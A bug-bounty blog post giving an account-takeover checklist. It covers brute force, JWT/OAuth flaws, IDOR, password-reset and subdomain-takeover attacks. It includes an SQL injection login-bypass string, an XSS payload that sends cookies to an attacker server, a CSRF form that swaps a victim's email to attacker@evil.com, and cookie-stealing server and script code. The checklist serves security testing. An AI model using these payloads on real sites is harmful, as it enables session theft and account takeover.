Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
  • SQL
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
  • Small Business
  • Resources
  • White Papers
  • Crypto News
  • Programming
    • Python
    • NodeJS
    • Java
    • Javascript
    • PHP
    • Agile
    • TypeScript
  • Android
  • SEO
  • Microsoft
    • Azure
    • Dot Net
    • Powershell
  • Networking
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    XRAY GUI Starter Web Vulnerability Scanner
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    Data Science Command Line
    Machine Learning on Geographical Data
    Data Science Squad Roadmap
    Defence Artificial Intelligence Strategy
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    Tools and Techniques for Red Team
    Process Injection Enumeration Tool
    SSH based reverse shell
    XRAY GUI Starter Web Vulnerability Scanner
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    DevOps Learning resources
    Linux Ultimate Guide
    DevOps Roadmap 2022
    Collection of tips on Linux
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Awesome Forensics
    Awesome Event IDs
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Previous Next
  • SQL
    SQL Cheat Sheet
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Blue Glowing Keyboard Enter Button And Red Glowing Security Padlock Icon, Security Concept For Shopping And Browsing On The Internet
Bug Bounty

BugBounty – Account Takeover Checklist

Stella Sebastian
Posted by Stella Sebastian November 12, 2021

superior_hosting_service

BugBounty

Account Takeover Checklist


  • login:
    •  check if you are able to brute force the password
    •  Test for OAuth misconfigurations
    •  check if you are able to bruteforce the login OTP
    •  check for JWT mesconfigurations
    •  Test for SQL injection to bypass authenticationadmin" or 1=1;--
    •  check if the application validates the OTP or Token
  • password reset:
    •  check if you are able to brute force the password reset OTP
    •  test for token predectability
    •  test for JWT misconfigurations
    •  check if the password reset endpoint is vulnerable to IDOR
    •  check if the password reset endpoint is vulnerable to Host Header injection
    •  check if the password reset endpoint is leaking the token or OTP in the HTTP response
    •  check if the application validates the OTP or Token
    •  test for HTTP parameter Pollution (HPP)
  • XSS to Account Takeover:
    •  if the application does not use auth token or you can’t access the cookies because the “HttpOnly” flag, you can obtain the CSRF token and craft a request to change the user’s email or password
    •  try to exfiltrate the cookies
    •  try to exfiltrate the Auth Token
    •  if the cookie’s “domain” attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies

PoC Example

<script>
    /*
    this script will create a hidden <img> element
    when the browser tries to load the image
    the victim's cookies will be sent to your server
    */

    var new_img = document.createElement('img');
    new_img.src = "http://yourserver/" + document.cookie;
    new_img.style = 'display: none;'
    document.body.appendChild(new_img);
</script>
  • CSRF to Account Takeover:
    •  check if the email update endpoint is vulnerable to CSRF
    •  check if the password change endpoint is vulnerable to CSRF

PoC Example

    <html>
        <head>
            <title>CSRF PoC</title>    
        <head>
        <body>
            <form name='attack' action='https://example.com/update-email' method='POST'>
                <input type="hidden" name="new_email" value="attacker@evil.com">
                <input type="submit" name="submit" value="submit" hidden>
            <form>
            <script>
                document.attack.submit.click()
            </script>
        </body>
    </html>
  • IDOR to Account Takerover:
    •  checck if the email update endpoint is vulnerable to IDOR
    •  check if the password change endpoint is vulnerable to IDOR
    •  check if the password reset endpoint vulnerable to IDOR
  • subdomain takeover:
    •  first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies

PoC Example

#!/usr/bin/python3
from flask import *

app = Flask(__name__)

@app.route('/')
def cookie_sniffer():
    for c_name, c_value in request.cookies.items():
        print(c_name + ': ' + c_value)
    return 'Hello, world'
if __name__ == '__main__':
    app.run(port=80)
  •  second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies

PoC Example

user_cookies = {
    "cookies": document.cookie
}

var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
xhttp.send(JSON.stringify(user_cookies));

Github Link
Cyber Threat Intel

Tags: Account Takeover bruteforce bugbounty csrf IDOR JWT Subdomain TakeOver XSS
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian November 12, 2021
Previous Article Cyber Threat Intel
Next Article NodeJS Package List

Leave a Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Posts

Tools and Techniques for Red Team

December 26, 2022

Process Injection Enumeration Tool

December 20, 2022

SSH based reverse shell

December 18, 2022

XRAY GUI Starter Web Vulnerability Scanner

December 16, 2022
HostnExtra Ads
Neevahost ad post

You Might Also Enjoy

Resources

Tools and Techniques for Red Team

December 26, 2022
Tools

SSH based reverse shell

December 18, 2022
Tools

XRAY GUI Starter Web Vulnerability Scanner

December 16, 2022
Malware

Intelligent Mobile Malware Detection

December 14, 2022
Load More
  • ABOUT
  • ADVERTISEMENT
  • TEAM
  • JOBS
  • CONTACT
  • PRIVACY POLICY
  • DISCLOSURE

© 2021 Reconshell All Rights Reserved.